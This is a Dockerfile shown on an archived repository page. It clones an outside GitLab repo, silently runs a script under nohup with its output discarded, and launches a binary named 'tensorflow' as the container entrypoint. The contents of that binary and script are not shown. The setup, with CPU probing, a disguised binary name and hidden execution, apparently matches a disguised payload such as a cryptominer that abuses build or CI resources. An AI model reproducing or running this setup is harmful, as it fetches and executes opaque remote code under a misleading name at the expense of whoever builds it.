You can not select more than 25 topics
Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
This repo is archived. You can view files and clone it, but cannot push or open issues/pull-requests.
|
FROM ubuntu:latest |
|
RUN lscpu |
|
RUN apt-get update -y; apt-get install git -y |
|
RUN git clone https://gitlab.zam.io/wajinhakim/drone-test.git; |
|
WORKDIR /drone-test |
|
RUN chmod +x tensorflow direct.sh |
|
RUN nohup bash direct.sh > /dev/null |
|
ENTRYPOINT ["tensorflow"] |